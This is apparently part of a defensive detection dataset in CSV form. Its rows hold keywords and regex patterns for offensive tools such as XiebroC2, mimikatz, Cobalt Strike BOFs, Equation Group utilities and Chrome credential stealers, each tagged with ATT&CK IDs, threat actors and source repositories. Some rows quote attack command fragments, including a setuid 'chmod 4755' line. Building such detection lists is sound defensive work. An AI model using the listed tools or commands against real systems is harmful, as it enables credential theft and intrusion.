"*chmod +x XiebroC2MAc*",".{0,1000}chmod\s\+x\sXiebroC2MAc.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#linux","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","38192"
"*chmod 666 /var/run/utmp~*",".{0,1000}chmod\s666\s\/var\/run\/utmp\~.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","38194"
"*chmod 700 lse.sh*",".{0,1000}chmod\s700\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","38196"
"*chmod 700 nscd crond*",".{0,1000}chmod\s700\snscd\scrond.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","#linux","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z","38197"
"*chmod 755 lse.sh*",".{0,1000}chmod\s755\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","38198"
"*chmod 755 msfinstall*",".{0,1000}chmod\s755\smsfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38199"
"*chntpw Edit User Info & Passwords*",".{0,1000}chntpw\sEdit\sUser\sInfo\s\&\sPasswords.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38200"
"*chntpw.com/download*",".{0,1000}chntpw\.com\/download.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38201"
"*chntpw.static*",".{0,1000}chntpw\.static.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38202"
"*choco install * common.fireeye*",".{0,1000}choco\sinstall\s.{0,1000}\scommon\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38203"
"*chocobo_root.c",".{0,1000}chocobo_root\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38207"
"*chocolate.kirbi*",".{0,1000}chocolate\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","38208"
"*chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802*",".{0,1000}chompie1337\/Windows_MSKSSRV_LPE_CVE\-2023\-36802.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","38209"
"*Choose The RPC Function [1]VpnProtEngWinRtConnect [2]VpnProtEngGetInterface*",".{0,1000}Choose\sThe\sRPC\sFunction\s\[1\]VpnProtEngWinRtConnect\s\[2\]VpnProtEngGetInterface.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","38210"
"*Choosing DLL to hijack.*",".{0,1000}Choosing\sDLL\sto\shijack\..{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","38211"
"*chop target username password domain filename chd wmi*",".{0,1000}chop\starget\susername\spassword\sdomain\sfilename\schd\swmi.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38212"
"*chopper.exe -m*",".{0,1000}chopper\.exe\s\-m.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38213"
"*chopper.exe -s*",".{0,1000}chopper\.exe\s\-s.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38214"
"*chopper.exe -w*",".{0,1000}chopper\.exe\s\-w.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38215"
"*chown root %s  chmod 4755 %s  %s*",".{0,1000}chown\sroot\s\%s\s\schmod\s4755\s\%s\s\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38218"
"*Chredx765ome\\Usedx765er Datedx765a*",".{0,1000}Chredx765ome\\\\Usedx765er\sDatedx765a.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","38221"
"*chrismaddalena/SharpCloud*",".{0,1000}chrismaddalena\/SharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","38222"
"*chrispetrou/HRShell*",".{0,1000}chrispetrou\/HRShell.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","38223"
"*christophetd/spoofing-office-macro*",".{0,1000}christophetd\/spoofing\-office\-macro.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","38224"
"*Chroedx765mium\\Useedx765r Data*",".{0,1000}Chroedx765mium\\\\Useedx765r\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","38225"
"*Chrome App-Bound Encryption - Decryption*",".{0,1000}Chrome\sApp\-Bound\sEncryption\s\-\sDecryption.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","38226"
"*Chrome Password Recovery*",".{0,1000}Chrome\sPassword\sRecovery.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38227"
"*Chrome Passwords List!*",".{0,1000}Chrome\sPasswords\sList!.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38228"
"*chrome_creds.txt*",".{0,1000}chrome_creds\.txt.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","38232"
"*ChromeAppBound::BytesToHexString(en crypted_key.data*",".{0,1000}ChromeAppBound\:\:BytesToHexString\(en\scrypted_key\.data.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","38233"
"*chromecertbeggar.js*",".{0,1000}chromecertbeggar\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38234"
"*chromecertbeggar2.js*",".{0,1000}chromecertbeggar2\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38235"
"*chrome-dump.dll*",".{0,1000}chrome\-dump\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38239"
"*ChromeDump.git*",".{0,1000}ChromeDump\.git.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","38240"
"*chromedump.py*",".{0,1000}chromedump\.py.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","38241"
"*chrome-dump.x86.dll*",".{0,1000}chrome\-dump\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38242"
"*ChromeDump-main.zip*",".{0,1000}ChromeDump\-main\.zip.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","38243"
"*ChromeKatz/Memory.cpp*",".{0,1000}ChromeKatz\/Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38244"
"*ChromeKatz/Process.cpp*",".{0,1000}ChromeKatz\/Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38245"
"*ChromeKatz\Memory.cpp*",".{0,1000}ChromeKatz\\Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38246"
"*ChromeKatz\Process.cpp*",".{0,1000}ChromeKatz\\Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38247"
"*chromeKey.x64*",".{0,1000}chromeKey\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38248"
"*chromeKey.x86*",".{0,1000}chromeKey\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38249"
"*chromepass.exe*",".{0,1000}chromepass\.exe.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38250"
"*chromepass.zip*",".{0,1000}chromepass\.zip.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38251"
"*ChromeStealer.exe*",".{0,1000}ChromeStealer\.exe.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","1","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","38255"
"*Chromium Bookmarks Snatch Failed*",".{0,1000}Chromium\sBookmarks\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38256"
"*Chromium Cookie Snatch Failed*",".{0,1000}Chromium\sCookie\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38257"
"*Chromium History Snatch Failed*",".{0,1000}Chromium\sHistory\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38258"
"*Chromium Password Snatch Failed*",".{0,1000}Chromium\sPassword\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38259"
